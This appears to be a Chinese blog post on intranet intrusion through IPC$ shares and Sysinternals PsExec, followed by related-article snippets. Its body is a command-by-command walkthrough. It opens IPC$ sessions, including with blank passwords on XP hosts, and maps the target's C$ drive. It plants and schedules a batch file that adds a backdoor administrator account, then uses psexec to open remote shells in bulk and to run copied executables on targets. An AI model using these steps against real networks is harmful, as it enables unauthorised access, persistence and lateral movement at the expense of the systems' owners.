內網IPC$入侵加pstools之遠程控制

前言：

IPC$(Internet process connection)是指內網里面的文件共享連接，通常很多機子的默認共享都是打開的，在cmd下使用命令net share可查看自己的IPC$是否打開。

PsTools是Sysinternals Suite中一款排名靠前的一個安全管理工具套件。現在被微軟收購。目前pstools中含有12款各式各樣的小工具。如果將它們靈活的運用，將會在滲透中收到奇效。所有的pstool第一次運行時都會彈框。可以用–accepteula這個參數繞過。

pstools可批量遠程操作windows服務器，還有所有的pstool都支持IPC$，一旦IPC$共享是連接的就不用輸入-u 和-p這兩個參數。

IPC$共享連接

在內網對已知用戶密碼的主機建立IPC$連接，命令如下：

1. Net use \\目標ip\IPC$ "密碼" /user:"用戶"

如果目標內網機是xp的系統，那么可以不用用戶和密碼即可建立IPC連接，且攻擊機的系統不能是win10及以上

例如：

1. net use \\192.168.1.121\IPC$ "" /user:"administrator"

建立后所有的ps工具都將可以不用輸入用戶和密碼了。

建立連接之后可以進行磁盤映射

1. net use Z: \\192.168.1.121\c$
   
2. 將目標機的C盤映射到本機的新建Z盤

用IPC$添加用戶的操作：

1. net user test /add
   
2. net localgroup administrators test /add
   
3. 將上訴兩條命令保存位adduser.bat文件，然后在本機上執行(已建立連接)
   
4. copy adduser.bat \\192.168.1.121\c$
   
5. net time \\192.168.1.121
   
6. at \\192.168.1.121 執行時間 c:\adduser.bat
   
7. 刪除當前連接，用新的用戶建立IPC$連接
   
8. net use \\192.168.1.121\ipcc$ /del

win7以前可以使用at命令執行定時任務，但win7及其以后將使用schtasks命令：

1. 每天固定時間使用system權限執行記事本
   schtasks /Create /TN TestService2 /SC DAILY /ST : /TR notepad.exe /RL HIGHEST

開啟23端口可用telnet登錄。

pstools工具使用

需要目標主機開啟admin$共享且必須在一個內網才能使用，pstools包含一套工具

其中12款工具簡介如下：

1. PsExec - 遠程執行進程
   
2. PsFile - 顯示遠程打開的文件
   
3. PsGetSid - 顯示計算機或用戶的 SID
   
4. PsInfo - 列出有關系統的信息
   
5. PsKill - 按名稱或進程 ID 終止進程
   
6. PsList - 列出有關進程的詳細信息
   
7. PsLoggedOn - 查看在本地通過資源共享（包含所有資源）登錄的用戶
   
8. PsLogList - 轉儲事件日志記錄
   
9. PsPasswd － 更改帳戶密碼
   
10. PsService - 查看和控制服務
    
11. PsShutdown - 關閉並重新啟動（可選）計算機
    
12. PsSuspend - 暫停進程

psexec介紹

ps利用最大的就是他了，他可以配合ipc使用。

獲取目標機的shell命令結構為：

1. psexec \\目標ip -u 用戶名 -p 密碼 進程名

1. psexec \\192.168.1.121 –u administrator –p 123456 cmd.exe

如果ipc已建立連接，那么可以不用輸入用戶密碼，直接 psexec \\192.168.1.121\ cmd.exe就好了，exit退出shell。

批量運行psexec連接cmd，這個方法適合用於內網存在大量xp系統，先將這些ip保存在一個記事本里面，然后按順序寫好一系列cmd命令放入bat文件中，然后命令行輸入：

1. PsExec @D:\PSTools\ip.txt -c D:\PSTools\.bat cmd.exe

即可返回批量shell。

如果想要遠程機器執行本地c:\srm.exe文件可以打：

1. psexec \\遠程機器ip -u administrator -p -c c:\srm.exe

本片文章只講了IPC$和pstools里面的psexec的配合使用，其他pstools工具的使用請參照以下鏈接：

參考鏈接：https://www.cnblogs.com/h4ck0ne/p/5154599.html

內網IPC$入侵加pstools之遠程控制的更多相關文章

1. 內網IPC$入侵

   一.域操作相關的命令1.查看域用戶 net user/domain2.查看有幾個域 net view/domain3.查看域內的主機 net view/domain: XXX4.查看域里面的組 net ...

2. 4. 內網滲透之IPC$入侵

   IPC$連接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的資源,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限 ...

3. 【APT】NodeJS 應用倉庫釣魚,大規模入侵開發人員電腦,批量滲透各大公司內網

   APT][社工]NodeJS 應用倉庫釣魚,大規模入侵開發人員電腦,批量滲透各大公司內網 前言 城堡總是從內部攻破的.再強大的系統,也得通過人來控制.如果將入侵直接從人這個環節發起,那么再堅固的防線, ...

4. 基於SNMP的交換機入侵的內網滲透

   前言:局域網在管理中常常使用SNMP協議來進行設備的管理和監控,而SNMP的弱點也成為了我們此次滲透的關鍵. 使用SNMP管理設備只需要一個community string,而這個所謂的密碼經常采用默 ...

5. 遠程控制使用kill軟件映射內網進行遠程控制（9.28 第十四天）

   1.能ping通IP情況下遠程控制 設置kill軟件中的端口.密碼.上線列表 2.在軟件的Bin\Plugins目錄下找到Consys21.dll復制到/phpstudy/www目錄下留作生成軟件 3 ...

6. 醫院內外網之間通過網閘交互，通過端口轉發加nginx代理實現內網訪問外網

   首先介紹下主要需求,很簡單,就是要在醫院his系統內嵌公司的平台,實現內網直接訪問外網 這是院方給我提供的網閘相關配置,105是醫院內網的服務器,120是外網的服務器,中間通過網閘配置的幾個端口實現互 ...

7. 定位內網中毒主機IP經歷小記

   一.事件起因 客戶向公司反映使用IDS設備捕獲到木馬上線域名需要處理,雖然是逆向崗但還是有預感未來應急響應的工作只會越來越多.所以作為新人的我選擇了跟帶頭BOSS去現場學習,並且將自己參與應急響應中的 ...

8. 使用.net standard實現不同內網端口的互通（類似花生殼）

   應用場景 1.公司電腦與家中電腦的遠程控制,一般通過teamview.向日葵等軟件,端口互通后,可以使用電腦自帶的遠程桌面 2.家中電腦搭建SVN.git倉庫,在外網或者內網訪問,一般使用雲服務器,端 ...

9. Django + Apache + 樹莓派 搭建內網微信公眾號服務器

   其實早在微信開放公眾號開發平台時就想弄一個自己的公眾號服務器,奈何對web服務器搭建和開發一竅不通,只是注冊了一下開發者帳號,並沒有采取行動,萬惡的拖延症. 前一年,開始接觸python,打開了神奇世 ...

隨機推薦

1. python調用py中rar的路徑問題。

   1.python調用py,在py中的os.getcwd()獲取的不是py的路徑,可以通過os.path.split(os.path.realpath(__file__))[0]來獲取py的路徑. 2. ...

2. [IBM DB2] db2 terminate 和 db2 connect reset 有什么區別?

   [IBM DB2] db2 terminate 和 db2 connect reset 有什么區別?  總結:如果是退出編輯器 quit :如果是斷開數據庫連接釋放資源 connect reset : ...

3. 錯誤The request sent by the client was syntactically incorrect ()的解決

   http://www.cnblogs.com/xiandedanteng/p/4168609.html 這個錯誤是SpringMVC報出來的,見到它意味着html/jsp頁面的控件名稱 和 contr ...

4. Model&Animation

   [Model&Animation] 1.FBX文件是一個完整的模型,通常內含Mesh,Material,Texture,Animation,即內含構成一個完成GameObject所需要的一切組 ...

5. hdu1051 Wooden Sticks

   題目:http://acm.hdu.edu.cn/showproblem.php?pid=1051 大意:求最少升序序列的個數. #include <cstdio> #include &l ...

6. TF31003錯誤的解決辦法

   TF31003錯誤的解決辦法   在今天上午機器重新啟動后,VS2012突然無法連接TFS2010了.在機器重新啟動之前還使用正常.剛開始以為TFS出現了問題,不過其他小組同事使用卻正常,問題應該在我 ...

7. linux下安裝cmake和mysql遇到的問題總結

   首先是在安裝cmake的過程中遇到的問題: 1.開始使用yum命令安裝時,不知道為什么一直不行,然后就准備wget 來先下載壓縮包,再手動編譯. 因為網絡限制,wget不能下載外網的東西一直顯示con ...

8. TestFlight的使用--再也不用擔心環境打錯了

   轉贊請注明出處:http://www.cnblogs.com/zhanggui/p/7039651.html 一.前言 在iOS開發過程中,難免會遇到各種Bug.因此你會去解決所有的Bug,然后提交到 ...

9. request.getSession()幾種獲取情況之間的差異

   一.三種情況如下 HttpSession session = request.getSession(); HttpSession session = request.getSession(true); ...

10. [leetcode]123. Best Time to Buy and Sell Stock III 最佳炒股時機之三

    Say you have an array for which the ith element is the price of a given stock on day i. Design an al ...